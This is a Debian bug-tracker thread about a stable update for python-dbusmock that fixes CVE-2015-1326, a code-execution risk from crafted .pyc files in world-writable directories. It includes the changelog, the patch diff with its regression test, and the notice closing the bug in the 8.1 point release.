Your message dated Sat, 06 Jun 2015 13:11:11 +0100 with message-id <1433592671.2987.12.camel@adam-barratt.org.uk> and subject line Fix released with 8.1 point release has caused the Debian Bug report #786860, regarding jessie-pu: package python-dbusmock/0.11.4-1+deb8u1 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact owner@bugs.debian.org immediately.) -- 786860: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786860 Debian Bug Tracking System Contact owner@bugs.debian.org with problems
--- Begin Message ---
- To: Debian BTS Submit <submit@bugs.debian.org>
- Cc: Salvatore Bonaccorso <carnil@debian.org>
- Subject: jessie-pu: package python-dbusmock/0.11.4-1+deb8u1
- From: Martin Pitt <mpitt@debian.org>
- Date: Tue, 26 May 2015 09:34:46 +0200
- Message-id: <20150526073446.GK2947@piware.de>
Package: release.debian.org Severity: normal Tags: jessie User: release.debian.org@packages.debian.org Usertags: pu Hello, there is a low-impact security issue in python-dbusmock, which is described in detail on https://launchpad.net/bugs/1453815. I originally prepared a stable-security upload, but the security team (CC'ed Salvatore) asked this to be handled as a normal stable update instead. So I filed https://bugs.debian.org/786858 with a summary and proper version tracking, and uploaded python-dbusmock 0.11.4-1+deb8u1 to stable with the backported fix. This is fixed in 0.15.1-1 in testing/unstable, oldstable does not have python-dbusmock. Thanks, Martin -- Martin Pitt | http://www.piware.de Ubuntu Developer (www.ubuntu.com) | Debian Developer (www.debian.org)diff -Nru python-dbusmock-0.11.4/debian/changelog python-dbusmock-0.11.4/debian/changelog --- python-dbusmock-0.11.4/debian/changelog 2014-09-22 10:26:41.000000000 +0200 +++ python-dbusmock-0.11.4/debian/changelog 2015-05-26 09:26:24.000000000 +0200 @@ -1,3 +1,20 @@ +python-dbusmock (0.11.4-1+deb8u1) stable; urgency=medium + + * SECURITY FIX: When loading a template from an arbitrary file through the + AddTemplate() D-Bus method call or DBusTestCase.spawn_server_template() + Python method, don't create or use Python's *.pyc cached files. By + tricking a user into loading a template from a world-writable directory + like /tmp, an attacker could run arbitrary code with the user's + privileges by putting a crafted .pyc file into that directory. + + Note that this is highly unlikely to actually appear in practice as custom + dbusmock templates are usually shipped in project directories, not + directly in world-writable directories. + (Closes: #786858, LP: #1453815, CVE-2015-1326) + * Add debian/gbp.conf for "jessie" packaging branch. + + -- Martin Pitt <mpitt@debian.org> Tue, 26 May 2015 09:26:11 +0200 + python-dbusmock (0.11.4-1) unstable; urgency=medium * New upstream bug fix release. diff -Nru python-dbusmock-0.11.4/debian/gbp.conf python-dbusmock-0.11.4/debian/gbp.conf --- python-dbusmock-0.11.4/debian/gbp.conf 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/gbp.conf 2015-05-26 09:26:24.000000000 +0200 @@ -0,0 +1,2 @@ +[DEFAULT] +debian-branch = jessie diff -Nru python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch --- python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/patches/0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patch 2015-05-26 09:26:24.000000000 +0200 @@ -0,0 +1,75 @@ +From: Martin Pitt <martin.pitt@ubuntu.com> +Date: Mon, 11 May 2015 16:00:10 +0200 +Subject: SECURITY FIX: Prevent code execution through crafted pyc files + +When loading a template from an arbitrary file through the AddTemplate() D-Bus +method call or DBusTestCase.spawn_server_template() Python method, don't create +or use Python's *.pyc cached files.By tricking a user into loading a template +from a world-writable directory like /tmp, an attacker could run arbitrary code +with the user's privileges by putting a crafted .pyc file into that directory. + +Note that this is highly unlikely to actually appear in practice as custom +dbusmock templates are usually shipped in project directories, not directly in +world-writable directories. + +Thanks to Simon McVittie for discovering this! + +LP: #1453815 +CVE-2015-1326 +--- + dbusmock/mockobject.py | 13 +++++-------- + tests/test_api.py | 10 ++++++++++ + 2 files changed, 15 insertions(+), 8 deletions(-) + +diff --git a/dbusmock/mockobject.py b/dbusmock/mockobject.py +index 0228070..6d35608 100644 +--- a/dbusmock/mockobject.py ++++ b/dbusmock/mockobject.py +@@ -17,6 +17,7 @@ import time + import sys + import types + import importlib ++import imp + from xml.etree import ElementTree + + # we do not use this ourselves, but mock methods often want to use this +@@ -40,14 +41,10 @@ if sys.version_info[0] >= 3: + + def load_module(name): + if os.path.exists(name) and os.path.splitext(name)[1] == '.py': +- sys.path.insert(0, os.path.dirname(os.path.abspath(name))) +- try: +- m = os.path.splitext(os.path.basename(name))[0] +- module = importlib.import_module(m) +- finally: +- sys.path.pop(0) +- +- return module ++ mod = imp.new_module(os.path.splitext(os.path.basename(name))[0]) ++ with open(name) as f: ++ exec(f.read(), mod.__dict__, mod.__dict__) ++ return mod + + return importlib.import_module('dbusmock.templates.' + name) + +diff --git a/tests/test_api.py b/tests/test_api.py +index 57f0a62..7b8c126 100644 +--- a/tests/test_api.py ++++ b/tests/test_api.py +@@ -582,6 +582,16 @@ def load(mock, parameters): + self.addCleanup(p_mock.terminate) + self.addCleanup(p_mock.stdout.close) + ++ # ensure that we don't use/write any .pyc files, they are dangerous ++ # in a world-writable directory like /tmp ++ self.assertFalse(os.path.exists(my_template.name + 'c')) ++ try: ++ from importlib.util import cache_from_source ++ self.assertFalse(os.path.exists(cache_from_source(my_template.name))) ++ except ImportError: ++ # python < 3.4 ++ pass ++ + self.assertEqual(dbus_ultimate.Answer(), 42) + + # should appear in introspection diff -Nru python-dbusmock-0.11.4/debian/patches/series python-dbusmock-0.11.4/debian/patches/series --- python-dbusmock-0.11.4/debian/patches/series 1970-01-01 01:00:00.000000000 +0100 +++ python-dbusmock-0.11.4/debian/patches/series 2015-05-26 09:26:24.000000000 +0200 @@ -0,0 +1 @@ +0001-SECURITY-FIX-Prevent-code-execution-through-crafted-.patchAttachment: signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
- To: 781276-done@bugs.debian.org
- Cc: 781284-done@bugs.debian.org, 782900-done@bugs.debian.org, 783256-done@bugs.debian.org, 783404-done@bugs.debian.org, 783488-done@bugs.debian.org, 783489-done@bugs.debian.org, 783526-done@bugs.debian.org, 783722-done@bugs.debian.org, 783750-done@bugs.debian.org, 783811-done@bugs.debian.org, 783884-done@bugs.debian.org, 783973-done@bugs.debian.org, 784101-done@bugs.debian.org, 784178-done@bugs.debian.org, 784342-done@bugs.debian.org, 784383-done@bugs.debian.org, 784644-done@bugs.debian.org, 784714-done@bugs.debian.org, 784800-done@bugs.debian.org, 784801-done@bugs.debian.org, 784815-done@bugs.debian.org, 784816-done@bugs.debian.org, 784905-done@bugs.debian.org, 784943-done@bugs.debian.org, 784946-done@bugs.debian.org, 784962-done@bugs.debian.org, 784963-done@bugs.debian.org, 784964-done@bugs.debian.org, 784998-done@bugs.debian.org, 785154-done@bugs.debian.org, 785184-done@bugs.debian.org, 785201-done@bugs.debian.org, 785240-done@bugs.debian.org, 785254-done@bugs.debian.org, 785298-done@bugs.debian.org, 785301-done@bugs.debian.org, 785386-done@bugs.debian.org, 785478-done@bugs.debian.org, 785510-done@bugs.debian.org, 785523-done@bugs.debian.org, 785713-done@bugs.debian.org, 785718-done@bugs.debian.org, 786388-done@bugs.debian.org, 786389-done@bugs.debian.org, 786431-done@bugs.debian.org, 786513-done@bugs.debian.org, 786647-done@bugs.debian.org, 786720-done@bugs.debian.org, 786744-done@bugs.debian.org, 786811-done@bugs.debian.org, 786812-done@bugs.debian.org, 786856-done@bugs.debian.org, 786860-done@bugs.debian.org, 786863-done@bugs.debian.org, 786870-done@bugs.debian.org, 786912-done@bugs.debian.org, 786918-done@bugs.debian.org, 786922-done@bugs.debian.org, 786924-done@bugs.debian.org, 786982-done@bugs.debian.org, 787008-done@bugs.debian.org, 787014-done@bugs.debian.org, 787255-done@bugs.debian.org, 787260-done@bugs.debian.org, 787626-done@bugs.debian.org, 787636-done@bugs.debian.org
- Subject: Fix released with 8.1 point release
- From: "Adam D. Barratt" <adam@adam-barratt.org.uk>
- Date: Sat, 06 Jun 2015 13:11:11 +0100
- Message-id: <1433592671.2987.12.camel@adam-barratt.org.uk>
Version: 8.1 Hi, The fix discussed in this bug was released to stable as part of the 8.1 point release earlier today. Regards, Adam
--- End Message ---